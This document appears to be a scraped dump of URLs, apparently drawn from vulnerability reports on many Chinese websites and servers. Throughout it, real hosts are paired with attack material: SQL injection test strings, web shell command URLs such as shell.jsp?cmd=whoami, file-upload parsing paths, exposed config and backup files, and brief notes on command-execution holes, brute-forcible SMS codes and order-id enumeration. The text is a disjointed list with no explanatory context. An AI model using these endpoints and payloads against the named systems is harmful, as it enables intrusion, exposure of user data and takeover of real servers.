http://**.**.**.**/list.jsp?area_id=1&tag_id=1&tree_id=1 http://**.**.**.**/list.jsp?area_id=1&tag_id=1&tree_id=1 http://**.**.**.**/list.jsp?area_id=1&tag_id=1&tree_id=1 http://**.**.**.**/list.jsp?area_id=1&tag_id=1&tree_id=1 http://**.**.**.**/list.jsp?area_id=1&tag_id=1&tree_id=1 http://**.**.**.**/list.jsp?area_id=1&tag_id=1&tree_id=1 http://**.**.**.**/list.jsp?area_id=1&tag_id=1&tree_id=1 http://**.**.**.**/list.jsp?area_id=1&tag_id=1&tree_id=1 http://**.**.**.**/list.jsp?area_id=1&tag_id=1&tree_id=1 http://**.**.**.**/list.jsp?area_id=1&tag_id=1&tree_id=1 http://**.**.**.**/ajax/calenday_ajax.jsp http://**.**.**.**/ajax/calenday_ajax.jsp http://**.**.**.**/ajax/calenday_ajax.jsp http://**.**.**.**/ajax/calenday_ajax.jsp http://**.**.**.**/ajax/calenday_ajax.jsp http://**.**.**.**/ajax/calenday_ajax.jsp http://**.**.**.**/ajax/calenday_ajax.jsp http://**.**.**.**/ajax/calenday_ajax.jsp http://**.**.**.**/ajax/calenday_ajax.jsp http://**.**.**.**/ajax/calenday_ajax.jsp http://**.**.**.**/ajax/calenday_ajax.jsp http://**.**.**.**/ajax/ticket_calendar_ajax.jsp http://**.**.**.**/ajax/ticket_calendar_ajax.jsp http://**.**.**.**/ajax/ticket_calendar_ajax.jsp http://**.**.**.**/ajax/ticket_calendar_ajax.jsp http://**.**.**.**/ajax/ticket_calendar_ajax.jsp http://**.**.**.**/ajax/ticket_calendar_ajax.jsp http://**.**.**.**/ajax/ticket_calendar_ajax.jsp http://**.**.**.**/ajax/ticket_calendar_ajax.jsp http://**.**.**.**/ajax/ticket_calendar_ajax.jsp http://**.**.**.**/ajax/ticket_calendar_ajax.jsp http://**.**.**.**/ajax/ticket_calendar_ajax.jsp http://**.**.**.**/order/order_show.jsp?order_id=1&password=1 http://**.**.**.**/order/order_show.jsp?order_id=1&password=1 http://**.**.**.**/order/order_show.jsp?order_id=1&password=1 http://**.**.**.**/order/order_show.jsp?order_id=1&password=1 http://**.**.**.**/order/order_show.jsp?order_id=1&password=1 http://**.**.**.**/order/order_show.jsp?order_id=1&password=1 http://**.**.**.**/order/order_show.jsp?order_id=1&password=1 http://**.**.**.**/order/order_show.jsp?order_id=1&password=1 http://**.**.**.**/order/order_show.jsp?order_id=1&password=1 http://**.**.**.**/order/order_show.jsp?order_id=1&password=1 http://**.**.**.**/order/order_show.jsp?order_id=1&password=1 http://**.**.**.**/order/order_show.jsp?order_id=1&password=1 http://m.handu.com(124.128.76.36)。因为手机验证时验证码为4位,且m.handu.com不像主站一样对验证码次数做限制,导致可通过遍历0000-9999验证码方式注册任意账号。 http://m.handu.com:80/user.php?act=ajax_region_list®ion_id=1 site:189.cn inurl:order http://m.gd.189.cn/telExchange/orderExchangeView.action?orderExchangeId=H109967511291 http://**.**.**.**/workplate/base/org/WebUserList.aspx?id=99 http://**.**.**.**/workplate/base/org/WebUserList.aspx?id=99 http://**.**.**.**/workplate/base/org/WebUserList.aspx?id=99 http://**.**.**.**/workplate/base/org/WebUserList.aspx?id=99 http://**.**.**.**/workplate/base/org/WebUserList.aspx?id=99 http://**.**.**.**/workplate/xzsp/gxxt/tjfx/sxlist.aspx?baseorg=214 http://**.**.**.**/workplate/xzsp/gxxt/tjfx/sxlist.aspx?baseorg=214 http://**.**.**.**/workplate/xzsp/gxxt/tjfx/sxlist.aspx?baseorg=214 http://**.**.**.**/workplate/xzsp/gxxt/tjfx/sxlist.aspx?baseorg=214 http://**.**.**.**/workplate/xzsp/gxxt/tjfx/sxlist.aspx?baseorg=214 http://**.**.**.**/workplate/xzsp/kqgl/tjfx/listBcmx2.aspx?org=159 http://**.**.**.**/workplate/xzsp/kqgl/tjfx/listBcmx2.aspx?org=159 http://**.**.**.**/workplate/xzsp/kqgl/tjfx/listBcmx2.aspx?org=159 http://**.**.**.**/workplate/xzsp/kqgl/tjfx/listBcmx2.aspx?org=159 http://**.**.**.**/workplate/xzsp/kqgl/tjfx/listBcmx2.aspx?org=159 http://**.**.**.**/workplate/xzsp/gxxt/tjfx/dtl.aspx?id=47068 http://**.**.**.**/workplate/xzsp/gxxt/tjfx/dtl.aspx?id=47068 http://**.**.**.**/workplate/xzsp/gxxt/tjfx/dtl.aspx?id=47068 http://**.**.**.**/workplate/xzsp/gxxt/tjfx/dtl.aspx?id=47068 http://**.**.**.**/workplate/xzsp/gxxt/tjfx/dtl.aspx?id=47068 http://**.**.**.**/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=382 http://**.**.**.**/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=382 http://**.**.**.**/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=382 http://**.**.**.**/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=382 http://**.**.**.**/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=382 http://**.**.**.**/workplate/comm/noti/mobilemsgsend.aspx http://**.**.**.**/workplate/comm/noti/mobilemsgsend.aspx http://**.**.**.**/workplate/comm/noti/mobilemsgsend.aspx http://**.**.**.**/workplate/comm/noti/mobilemsgsend.aspx http://**.**.**.**/workplate/comm/noti/mobilemsgsend.aspx http://**.**.**.**/workplate/xzsp/tjfx/ckmx/ckmxlist.aspx http://**.**.**.**//workplate/xzsp/tjfx/ckmx/ckmxlist.aspx http://**.**.**.**//workplate/xzsp/tjfx/ckmx/ckmxlist.aspx http://**.**.**.**//workplate/xzsp/tjfx/ckmx/ckmxlist.aspx http://**.**.**.**//workplate/xzsp/tjfx/ckmx/ckmxlist.aspx http://www.newman.mobi/ http://oa.chinawanda.com:1010/login.php http://oa.chinawanda.com:1010/index.php http://oa.gszs.cn/ http://kygl.jhun.edu.cn/ky/vsMan.do?method=detailMan&manCode=11104091 http://kygl.jhun.edu.cn/ky/vsMan.do?method=detailMan&manCode= http://www.100.cn/ http://www.100.cn/user/resetpwd-index.html http://www.xmitic.com/reserve.aspx?id=41 http://www.xmitic.com/info.aspx?id=10030001000101010002 http://www.xmitic.com/manage/main.aspx http://218.5.98.136:8080/new/info/InfoChange.asp?InfoSort_PK=100001003 http://218.5.98.136:8080/new/info/InfoChange.asp?InfoSort_PK=100001002 http://www.xmitic.com/web.zip http://www.bangcle.com/login/ http://117.34.110.103:8090/dxszz/regUser.action存在命令执行漏洞 http://taste.tv189.com http://v.tv189.com/ http://so.tv189.com/ http://ifengvip.tv189.com/ http://hi.tv189.com/ http://my.tv189.com/ http://yx.tv189.com/ http://www.iskyworth.com/Admin/login.aspx http://v.17173.com:80/actapi/vinfo/getVinfo?orderby=3&type=web&pnum=5&videotype=1__&callback=jQuery110207761335416783393_1435040010287&_=1435040010289&acid=9 http://yt.linekong.com:80/ http://219.143.219.77/console/login/LoginForm.jsp http://218.93.241.6/sqth/login.action http://**.**.**/ggcs/login.action http://www.dyshxx.com:235/dylgy/login.aspx http://www.joy.cn/ www.joy.cn http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://www.aoledior.com/admin.php URL:http://www.aoledior.com//feedback/post.php http://**.**.**.**/sqscms/show/protal_showMoreNotices.do?type_id=203&portal=1 http://**.**.**.**/syxcms/show/protal_showMoreNotices.do?type_id=3&portal=1 http://**.**.**.**/shcms/show/protal_showMoreNotices.do?type_id=201&portal=1 http://**.**.**.**/jslyqtkfq/show/protal_showMoreNotices.do?type_id=13 http://**.**.**.**/jslyqtrg/show/protal_showMoreNotices.do?type_id=0033 http://**.**.**.**/sqscms/show/protal_showNoticeById.do?n_id=4ae6ee4b4dace093014e283f100f2a15 http://**.**.**.**/syxcms/show/protal_showNoticeById.do?n_id=4028818a4df4abef014df698a8ad0082 http://**.**.**.**/shcms/show/protal_showNoticeById.do?n_id=2c90b2e44dff5bb4014e0a903a0500e1 http://**.**.**.**/jslyqtkfq/show/protal_showNoticeById.do?n_id=2c9481bc4d92fb30014dff5052b70027 http://**.**.**.**/jslyqtrg/show/protal_showNoticeById.do?n_id=8a80c66032205cb601327433654200ff http://admin.ikanshu.cn http://admin.ikanshu.cn/WEB-INF/web.xml http://admin.ikanshu.cn/WEB-INF/classes/config.properties img.chineseall.net/UserFiles/pic/ http://img.chineseall.net/UserFiles/pic/ img.chineseall.net/UserFiles/brand/ http://img.chineseall.net/UserFiles/brand/ img.chineseall.net/UserFiles/product/ http://img.chineseall.net/UserFiles/product/ img.chineseall.net/UserFiles/product/ http://img.chineseall.net/UserFiles/product/ http://www.91job.gov.cn/manage/OCL/view_s.aspx?personid=65434970 http://www.91job.gov.cn/manage/OCL/view_s.aspx?personid=65434971 http://www.gtyjzy.com/ http://www.gtyjzy.com/e/install/index.aspx?__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTExODcwMDU5OTgPZBYCAgEPZBYCAgMPFgIeB1Zpc2libGVoZGQ%3D&ctl02=%E8%BF%90%E8%A1%8CSQL http://www.gtyjzy.com/e/master/index.aspx http://cart.vip.com/te2/cart.php?callback=callback&isGetLast=1 http://checkout.vip.com/app/getUnpayOrder.php?callback=callback http://www.boway.com/cn/Service/index/p/1.html?cateid=324 http://www.boway.com/Service/station.html?province=&cateid=214 http://www.boway.com/Service/station.html?cateid=214 https://app.jiwu.com:3443/hui_app/jiwuhui_qiang.apk http://119.254.70.121/ http://119.254.70.121/admin/upload/video/video_More.jsp,可以进行上传课程,不过没有对上传文件进行验证,导致任意文件上传,不过直接传到内网服务器了,无法shell,不过如果内部人员就完全可以进行操作了,所以还是有一定风险的 http://www.ymatou.com/reset?option=forget http://bbs.chuwi.com/bbs.chuwi.com.zip http://wooyun.org/bugs/wooyun-2010-0120638 http://www.deovo.com/Attac/AttList.aspx?tid=100000025399735 http://www.huatu.com/biaoqian/bqlist.php?id=4598&bqzkxx=676 http://www.huatu.com/test.php http://159.226.126.50/SpecialTalentsInfo.Asp http://159.226.126.50/wipmhrfile http://159.226.126.50/wipmhrpic/ http://**.**.**.**/common/activeX/activeX.php http://wenjing.ytu.edu.cn/shownews.php?id=7519%27%20and%201=1%20and%20%271%27=%271 http://wenjing.ytu.edu.cn/shownews.php?id=7519%27%20and%201=2%20and%20%271%27=%271 http://kszx.xaau.edu.cn/news.php?id=13 http://sqlmap.org intitle:Login http://hanwang.com.cn/login.php http://mail.tofine.com:8090/login.php http://mail.tofine.com:8090/sys/login.php http://mail.kddl.cn:8090/sys/login.php http://mail.cqdc.com:8090/sys/login.php http://pop3.huaxia.com:8090/sys/login.php http://mail.nxcqcz.com:8090//sys/login.php http://mail.kmgfsj.cn:8090/login.php http://mail.nxcqcz.com:8090/login.php http://mail.timeloit.com:8090/login.php http://mail.dx-job.com:8090/sys/login.php http://kids.chineseall.cn http://kids.chineseall.cn/index.php/index/search?book_key=%27or%271%27%3D%271 http://kids.chineseall.cn/index.php/index/search?book_key=%27or%271%27%3D%271 http://www.tthaodian.com/index.action http://**.**.**.**/doc/ http://**.**.**.**/doc http://**.**.**.**/doc http://**.**.**.**/doc/ http://hi.haidilao.com/exchanges/inMobileEx.action?customerId=0100000059101316 http://itjuzi.com/tag?id=166&prov=北京&status=1 http://itjuzi.com/company/foreign?prov=北京&stage=3&status=2 http://itjuzi.com/investevents?scope=126&similar_money=1&sub_scope=131 http://itjuzi.com/location?born_year=2014&fund_status=15&id=国外&type=com http://itjuzi.com/merger?date=2013&location=in&scope=70 http://weboa.gto365.com/ http://weboa.gto365.com/e3oa/main.asp,可以查看总部文件、每日必读、总部公共、总部动态等信息,如: http://58.222.195.110:8081/jyweb/powerpunish/powerpunish_condition_reg_page.aspx http://221.230.140.252/tzptweb//powerpunish/powerpunish_condition_reg_page.aspx http://58.222.211.21/xhweb//powerpunish/powerpunish_condition_reg_page.aspx http://qlgk.taizhou.gov.cn/tzptweb//powerpunish/powerpunish_condition_reg_page.aspx http://58.222.216.220/ggweb//powerpunish/powerpunish_condition_reg_page.aspx http://58.222.195.110:8081/jyweb/powerpunish/powerpunish_sort_reg_page.aspx http://221.230.140.252/tzptweb/powerpunish/powerpunish_sort_reg_page.aspx http://58.222.211.21/xhweb/powerpunish/powerpunish_sort_reg_page.aspx http://qlgk.taizhou.gov.cn/tzptweb/powerpunish/powerpunish_sort_reg_page.aspx http://58.222.216.220/ggweb/powerpunish/powerpunish_sort_reg_page.aspx http://58.222.195.110:8081/jyweb/powerpunish/powerpunish_type_reg_page.aspx http://221.230.140.252/tzptweb/powerpunish/powerpunish_type_reg_page.aspx http://58.222.211.21/xhweb/powerpunish/powerpunish_type_reg_page.aspx http://qlgk.taizhou.gov.cn/tzptweb/powerpunish/powerpunish_type_reg_page.aspx http://58.222.216.220/ggweb/powerpunish/powerpunish_type_reg_page.aspx https://yn.ac.10086.cn/login/ http://banner.chinesegamer.net/gamebn/abmw.aspx?z=105&isframe=true http://my.cnki.net/cnkirec/unionpay/unionpaypay.aspx http://m.49you.com/ http://119.254.70.76/ http://119.254.70.76/job.php http://119.254.70.76/cache http://119.254.70.76/upload1 http://119.254.70.76/config/ http://119.254.70.76/include/ http://119.254.70.76/api http://119.254.70.76/static http://119.254.70.76/page http://119.254.70.76/payment http://119.254.70.76/upload1/中可以下载合同,里面部分含有租客信息 http://www.51zxw.net/help/help_rs.asp http://www.job088.com/jobsearch.php?areaid=*&edu=&exp=&job1=&job1_son=&keyword=&salary=&sex=&tid=611&type= http://kaipiaoba.homelink.com.cn/ri/system/logout.action http://admin.show3.soufun.com http://www.baixingbao518.com/Site/page/id/22.html http://www.baixingbao518.com/Site/page/id/22*.html http://api.49you.com/User/Login/doLogin?rnd=*&username=zhangjianwei&password=123456&save_id=undefined&returl=<ype=&adv_id=0&format=json&jsoncallback=* http://**.**.**.**/order/order_list.jsp http://**.**.**.**/order/order_list.jsp http://**.**.**.**/order/order_list.jsp http://**.**.**.**/order/order_list.jsp http://**.**.**.**/order/order_list.jsp http://**.**.**.**/order/order_list.jsp http://**.**.**.**/order/order_list.jsp http://**.**.**.**/order/order_list.jsp http://**.**.**.**/order/order_list.jsp http://**.**.**.**/order/order_list.jsp http://**.**.**.**/order/order_travel.jsp?info_id=7529106 http://**.**.**.**/order/order_travel.jsp?info_id=7529106 http://**.**.**.**/order/order_travel.jsp?info_id=7529106 http://**.**.**.**/order/order_travel.jsp?info_id=7529106 http://**.**.**.**/order/order_travel.jsp?info_id=7529106 http://**.**.**.**/order/order_travel.jsp?info_id=7529106 http://**.**.**.**/order/order_travel.jsp?info_id=7529106 http://**.**.**.**/order/order_travel.jsp?info_id=7529106 http://**.**.**.**/order/order_travel.jsp?info_id=7529106 http://**.**.**.**/order/order_travel.jsp?info_id=7529106 http://hdapp.hangzhou.com.cn/zhonghai/admin/index.php http://hdapp.hangzhou.com.cn/dashijie/admin/ http://hdapp.hangzhou.com.cn/jgpd/admin/ http://hdapp.hangzhou.com.cn/zhonghai/admin/ http://hdapp.hangzhou.com.cn/huodong2014/admin/ http://kd.gdmmyd.net/ www.cqcjda.com/urbanregonline/admin/applyinfo.aspx地址 inurl:ctvc.tv http://crm.ctvc.tv/general/ERP/LOGIN/logincheck.php http://crm.ctvc.tv/general/ERP/LOGIN/logincheck.php http://crm.ctvc.tv/general/ERP/LOGIN/logincheck.php http://wooyun.org/bugs/wooyun-2015-0107474 http://www.mse.fudan.edu.cn/ https://github.com/akiroz/wheelOfFortune/blob/72efc425cad3f35b7e9b7123e54cbad21069852e/src/main/java/Web.java https://github.com/CompanyAkuPunya/SPICT/blob/a9b9f807d5bdd95d954f4d53e4c9ac14d6f4acd3/spict.sql http://show.test.yoho.cn/admin/default/yoho http://i.49you.com/news/item/catid/55/id/15.html http://vae.haidilao.com:8680/ecitySSO/sso/beforeLogin.action http://www.haidilao.com/sg/index.php?m=comment&c=index&a=init&commentid=content_24-1-1&iframe=1&page=7079 http://wooyun.org/bugs/wooyun-2015-0116140 http://hi.haidilao.com/exchanges/inMobileEx.action?customerId=0100000059101391 http://api.49you.com//User/Login/doLogin http://www.xieche.com.cn/mobilecar-mycarservice_detail-pa_id--order_id-20000 http://www.gocha.cn/mobile/user.php?act=order_detail&order_id=5300 cn:8183 http://zb.suning.com/bid-web/supRegisterInitForPw.htm http://119.6.92.76:8080/axis2/axis2-admin/ http://uc.oppomobile.com/usercenter/bindMobile.do http://uc.oppomobile.com/usercenter/bindMobile.do http://www.fjbs.gov.cn/AppFile.action?fn=upload www.fjbs.gov.cn http://xsp.95306.cn/ http://xsp.95306.cn/payto.asp?orderlist=2015626181159 http://xsp.95306.cn/order_main.asp?id=2015626172159 http://www.baixingbao518.com/Logo/forgotpass.html http://**.**.**/qtfr/login/login.jsp http://iccb.99wuxian.com/air/iphone/air/order/air-order!getOrderForPay.action?orderId=99 http://dds.dji.com http://api.dji.com http://222.223.36.23:8089/wscgs/gzAction_viewGzList.action?gz.type=1 http://220.178.98.86/hfgjj/jsp/web/public/search/getPw.jsp http://contract.9fbank.com:9086/micro_kh/borrowing/list/getPayPlan?applicationId=157143 http://i.49you.com/ http://wwan.49you.com/.svn/entries http://i.49you.com/news/item/catid/55/id/15'.html http://180.150.185.34/ http://cms.49you.com//cms.sql http://bbs.digione.cn:7080//uc_server/data/tmp/upload48671.jpg/.php http://202.100.226.171/Default.aspx http://202.100.226.171/AdminLogin.aspx http://wooyun.org/bugs/wooyun-2015-0122761 http://119.254.70.121/upload/video/file_0000000305.jsp http://oa.nesc.cn/login/login.jsp http://oa.nesc.cn/userLoginAction.do http://oa.nesc.cn/login/login.jsp http://59.151.39.93:8080/console http://59.151.39.93:8080/shell/shell.jsp?cmd=whoami http://1000eb.com/1dtrw http://subsite.nenu.edu.cn/qnn/questionnaire.php?cs=8295 http://www.hnipo.net:8089/hy/login.jsp,密码已经自动生成,只需输入用户名admin和验证码即可登录。或者输入admin1//123456也可登录。 http://www.hnipo.net:8089/hy/manager/ipr/regQt/load_announ.action存在命令执行漏洞 http://service.ehang.com index.php/order/editorder/id/168* http://www.gsszczx.com/www/PrintExplain.asp?ApplyId=124150 http://www.gsszczx.com/www/PrintExplain.asp?ApplyId=124152 http://www.gsszczx.com/www/PrintExplain.asp?ApplyId=124153 http://sh.yiguo.com/UC/UserVote.aspx?commodityid=51a6e283-2547-4ae6-b687-8322ca4324d6 http://www.xigou100.com/user/forget.html http://www.lotterygd.cn http://www3.lotterygd.cn http://www.bjqx.gov.cn/consult.php?a=list&cid=1 http://www.ysmmall.com/emall/member/center/edit_address_input.html?id=357658 http://211.138.195.11/custom/pages/login.jsp http://211.138.195.11/custom/pages/login.jsp http://www.ztemall.com/ http://www.ztemall.com/payxx.html?xsbh=XX20150626003,通过遍历订单号,可以看到收货地址,电话等基本信息,但是无法查看订单详情: http://www.wanbu.com.cn/1.php http://www.wanbu.com.cn/server-status http://www.guocool.com http://**.**.**.**/SHowFiles/EquBookList.aspx http://**.**.**.**/syjx/share/SHowFiles/EquBookList.aspx http://**.**.**.**/SHowFiles/EquBookList.aspx http://**.**.**.**/nxdyq/SHowFiles/EquBookList.aspx http://zjy.gdcost.com/print/apply_jxjy.aspx?jxjyid=71140 http://zjy.gdcost.com/print/apply_jxjy.aspx?jxjyid=71142 http://zjy.gdcost.com/print/apply_jxjy.aspx?jxjyid=71143 http://event.gigabyte.cn/4years/ajax/new_checkzhuban.ashx?rcode= http://event.gigabyte.cn/4years/ajax/isbinglian.ashx?openid= http://fund.moe.edu.cn:80/sendEmail.action;教育部经费管理系统下存在远程命令执行漏洞,可执行命令获取服务器控制权限,对整个系统安全性构成严重威胁。 http://javatest.west263.com/userlist.jsp?sortfield=userid http://i.49you.com/game/item/catid/46/id/7.html http://www.leyou.com.cn/user/leyou/ManageInfo.php http://60.247.54.38:8089/SATTRAK/admin.jsp http://cm.zhangyue.com:80/a.tar.gz http://www.gxpiao.com/ http://www.gxpiao.com/YCDD150423-0114.html http://bbs.hikemobile.com/ http://www.hikemobile.com/hikeuc/data/tmp/upload31430.jpg/.php http://**.**.**.**:8080/workfield_tz/before/xyxxgx_cydwViewAll.do?yyzzzch=事证-D123456 http://**.**.**.**:8080/workfield_rg/before/xyxxgx_cydwViewAll.do?yyzzzch=320682000066280 http://**.**.**.**:8080/workfield_rg/before/xyxxgx_cydwViewAll.do?yyzzzch=320682000172132 http://**.**.**.**:8080/workfield_hm/before/xyxxgx_cydwViewAll.do?yyzzzch=320623000109815 http://**.**.**.**:8080/workfield_qd/before/xyxxgx_cydwView.do?yyzzzch=21084000031445&typesInShow=qyjbxx&depId=_ http://**.**.**.**:8080/workfield_hm/before/xyxxgx_cydwView.do?yyzzzch=3206842100865&typesInShow=cydwwfxx_cydwxzcfxx_cydwxzqzxx_cydwxzcjxx_qxjqjsbjxx_zlaqxx http://old.szytou.com/images/upload/data_file/847/20156261542367577.jpg/.php http://**.**.**.**/S/Default.aspx?theme=%E8%AF%BE%E4%BB%B6%27&Subject=%E6%94%BF%E6%B2%BB http://**.**.**.**/S/Default.aspx?theme=%E8%AF%BE%E4%BB%B6%27&Subject=%E6%94%BF%E6%B2%BB http://www.pailifood.com http://www.lshtyy.com http://www.guoniangfood.com http://www.cdgute.com http://www.heleegroup.com http://www.mxdl.com.cn http://www.ztsd.cn/ http://www.oldmansion.cn/ http://www.reachgroup.cn/ http://www.gigi.com.cn/ http://www.schlls.com/ http://www.lyhnhotel.com/ http://www.cd-sr.com http://www.reachgroup.cn http://www.cnbestluck.com http://henwei.wm10.mingtengnet.com/ http://www.hscatv.com http://cwrh.scu.edu.cn http://www.scwlrd.com http://www.zitonggong.com http://www.scbaijia.com http://www.gigi.com.cn http://www.wyjt.cn http://www.xinmingsl.com http://www.sferp.com http://www.beifei.cn http://www.scasdq.com http://sctlkj.com http://www.minsen.com http://www.birdhouse.org.cn http://henwei.wm10.mingtengnet.com http://sc-yunheng.com http://www.cdgute.com http://www.cdhot.cc http://www.jolen.com.cn http://hatyf.com http://qsjds.com/ http://qsjds.com http://quanfengjiuye.com http://m.darryring.com/AddAddress.aspx?id=56716,直接修改id就可以查看到其它用户的收获地址 http://www.test.sfn.com.cn/index.php/admin/login https://meican.com/account/forgotpassword https://meican.com/account/mobilelogin?mobileNumber= http://gad.qq.com/config/GetConfigList https://ticket.licaifan.com/login http://www.ruiqi.cd/理财端是 www.okdai.com http://minghang.im/ http://mail.okdai.com:999/Account/ http://115.29.188.181:999/Content/UploadFiles/201506261446116205bh.aspx http://www.ruiqi.cd/wooyun.txt http://ahnsfw.aisino.com/ahwsbsdt/login.jsp http://ahnsfw.aisino.com/ahwsbsdt/WEB-INF/struts-config.xml http://ahnsfw.aisino.com/ahwsbsdt/adminpostlist.jsp http://ahnsfw.aisino.com/ahwsbsdt//WEB-INF/applicationContext.xml jdbc:oracle:thin:@172.16.1.196:1521:nsfwdb http://61.190.68.67/nssbweb_ais/RpcServlet"/ http://192.168.2.13:8011/ahwsbsdt/servlet/RpcServlet"/ http://yunying.49you.com/index.php?g=Admin&m=Login https://8.gd10010.cn https://8.gd10010.cn/p/resetLoginPass?MBL_NO=13184390435 https://8.gd10010.cn https://8.gd10010.cn/p/resetLoginPass https://8.gd10010.cn/wc/resetLoginPass https://8.gd10010.cn/wc/resetLoginPass?MBL_NO=13184394739 URL:http://xinpan.zzhz.zjol.com.cn/zjol/newhouse/admin/Admin_login.html http://sales.happyinsurance.com.cn:7001/HL-Update/updateManage.jsp http://sales.happyinsurance.com.cn:7001/HL-Update/updateFiles/5.01.sug http://sales.happyinsurance.com.cn:7001/HL-Update/updateFiles/xxx.jsp http://my.fang.com/Account/ModifyUserInfo.do?v=0.627420610694839 http://www.smgjj.com/UploadFile/Import/DataTemp/ http://www.smgjj.com//newsbolcksecondlist.aspx?class=91be1fbd-5560-4fd0-91b6-2d0f5ae2f5b0&parentclass= www.smgjj.com/database/DataInput.aspx http://www.ehang.com:80/ www.ehang.com http://220.181.150.107/web.tgz URL:http://www.wepiao.com/?m=web&c=cinema&a=cinemadetailshow&cinemaid=1003290 https://code.jquery.com/jquery-1.9.1.min.js http://124.117.241.186:8787/SafeManagerWeb/loginAction!caLogin.action存在命令执行漏洞 http://blog.knownsec.com/2015/03/jsonp_security_technic/ http://drops.wooyun.org/papers/6630 https://code.jquery.com/jquery-1.9.1.min.js http://www.cashboxparty.com/star/star_basicdata.asp?sid=22 http://www.cashboxparty.com/star/star_excl.asp?sid=22 http://www.cashboxparty.com/star/star_newdisk.asp?sid=22 http://user.app.xywy.com/user.php?act=useredit http://bbs.ejiayu.com:5050/login.action http://bbs.ejiayu.com:5050/3.jsp?pwd=023&i=ls http://my.fang.com/MessageDefault/SendMessage.do http://oa.ctctc.cn:81/bpm/sso.nsf/login?openagent http://gad.qq.com/tool/getNewToolList?getCount=0&page=0&pageSize=5 http://www.caizhimofang.com/www.caizhimofang.com.rar http://git.weimai.com http://git.weimai.com/weimai/shangbao1/blob/master/Conf/config.php http://gonggao.org.cn/Jsp/cpmanage/feedback/sh_gzshow.jsp?cp_id=86743 http://202.109.255.72:9000 http://www.chtourong.com/member/common/login/ http://www.zydaibao.com/Account/FindPassword filetype:txt https://code.google.com/p/studentofficedocs/source/browse/trunk/%E5%AD%A6%E9%99%A2%E7%BE%A4%E5%8F%91%E7%9F%AD%E4%BF%A1%E7%94%A8%E6%88%B7%E5%90%8D%E5%AF%86%E7%A0%81.txt?r=9 m.feihe.com/qidai_content.aspx?id=113 http://baikan.zongheng.com/wap/search?pos=2&mo=&cm=M3140060&site=0&k=1 http://baikan.zongheng.com/wap/search?pos=2&mo=&cm=M3140060&site=0&k=1 http://www.youkia.com/index.php/news/getcommentlist http://pg.hiall.com.cn/config/config_global.bak http://jxjc.xjtu.edu.cn/website/news.php?id=100327 http://zc.suning.com/project/add.htm http://storeadmin.cnsuning.com/store-admin-web/admin/storeManage/storeInfo/sysManagerUserInfo/2015%252D06%252D01-2015%252D06%252D30---.htm http://www.iliangcang.com/i/shoppingcar/?act=delOne&cart_id=113512,看到这应该猜到估计可以删除其它cart_id的商品了 https://www.dianjr.com/user/forgetpwd http://www.iliangcang.com/i/goods/?act=deleteComm&id=4710 http://**.**.**.**/syjx/share/SHowFiles/MoreEqu.aspx http://**.**.**.**/SHowFiles/MoreEqu.aspx http://**.**.**.**/SHowFiles/MoreEqu.aspx http://**.**.**.**/nxdyq/SHowFiles/MoreEqu.aspx http://www.mangocity.com/index.php/freeline/productinfo_controller/journey_print?thirdpartid=215330p1 http://**.**.**.**/tzptweb/PeopleFreePress/accuse_list_page.aspx http://**.**.**.**/PeopleFreePress/accuse_list_page.aspx http://183.61.118.75 http://183.61.118.75/manager/html/ http://psychling.psych.ac.cn/members/everyone.php?filename=yangyf.php http://psychling.psych.ac.cn/members/everyone.php?filename=http://www.baidu.com http://m.mfa.go.th http://m.mfa.go.th/mofa/ http://www.xmtcs.fjxm110.gov.cn/xmga/web/listWeiXinsExt3 http://iwan.baidu.com/MobilegameAjax/isUserHasSubGift?gameid=589&gamename=我是注入点&gametype=shouyou http://mail.dianrong.com/ http://tongji.baidu.com/web/welcome/login http://zixun.dianrong.com/wp-admin http://jira.dianrong.com/ http://vote.10jqka.com.cn/webvote/index.php?vid=1f66d55819ac09bba97993dd89d61bf3 http://220.181.130.213:80/comment/wypl.jsp?title=Y_Vickers http://log.im.wo.cn/webportal/resources/validateCode http://xyk.nwu.edu.cn/homeLogin.action http://gm.49you.com/spirit/send2.html www.ehang.com/index.php?a=index&c=Index&g=Addon&m=Search&mid=3&time=day&wd=1 www.ctmedia.net http://user.adesk.com http://nagios.adesk.com http://user.adesk.com http://www.4008118228.cn/ http://www.4008118228.cn/jsp/yingxb/herodetail.jsp?Prop1=19303&InnerCode1=0062000800050001 http://www.4008118228.cn/jsp/yingxb/herodetail.jsp?Prop1=19303&InnerCode1=0062000800050001 http://www.hicn.com.cn/Home/Index http://www.hicn.com.cn/member/DomainManage/OrderInfo?id=164265 http://www.hicn.com.cn/member/DomainManage/OrderInfo?id=164266 http://wssp.hainan.gov.cn/wssp/hn/module/wssp/regist/sendMsgCode.jsp?mobile=18288888888 http://www.kancloud.cn/.git/config inurl:login http://61.155.209.38/DSM/login.aspx http://nmap.org/nsedoc/scripts/http-methods.html http://221.6.112.10:9999/safe/login.jsp http://221.6.112.10:9999/safe/enterprise/enterpriseAction!isCorpExist.action存在命令执行漏洞 http://202.203.158.123/Admin/ http://202.203.158.117/Index/login http://sddx.com.cn/news.asp?id=190注入点 http://**.**.**.**:8080/workfield_hm/before/xmxxgk_viewXmxx.do http://**.**.**.**:8080/workfield_qd/before/xmxxgk_viewXmxx.do http://**.**.**.**:8080/workfield_rg/before/xmxxgk_viewXmxx.do http://**.**.**.**:8080/workfield_rg/before/xmxxgk_getXmxxgkView.do?column=xmbm&value=2015320682FG0007&viewName=before_xmspgkxx&type=1&typesInShow=xmjyspfjgxx_kxxyjbgpfjgxx_cbsjfapfjgxx_jnpgscpfjgxx_ghxzyjpfjgxx_ydpfwjjgxx_hjyxpjspdjgxx_sgxkspxx_xmbaxx&depId http://**.**.**.**:8080/workfield_hm/before/xmxxgk_getXmxxgkView.do?column=xmbm&value=2015320684FG0016&viewName=before_xmjsglxx&type=2&typesInShow=zlaqjcxx http://**.**.**.**:8080/workfield_qd/before/xmxxgk_getXmxxgkView.do?column=xmbm&value=2014320681FG0012&viewName=before_xmspgkxx&type=1&typesInShow=xmjyspfjgxx_kxxyjbgpfjgxx_cbsjfapfjgxx_jnpgscpfjgxx_ghxzyjpfjgxx_ydpfwjjgxx_hjyxpjspdjgxx_sgxkspxx_xmbaxx&depId=_ 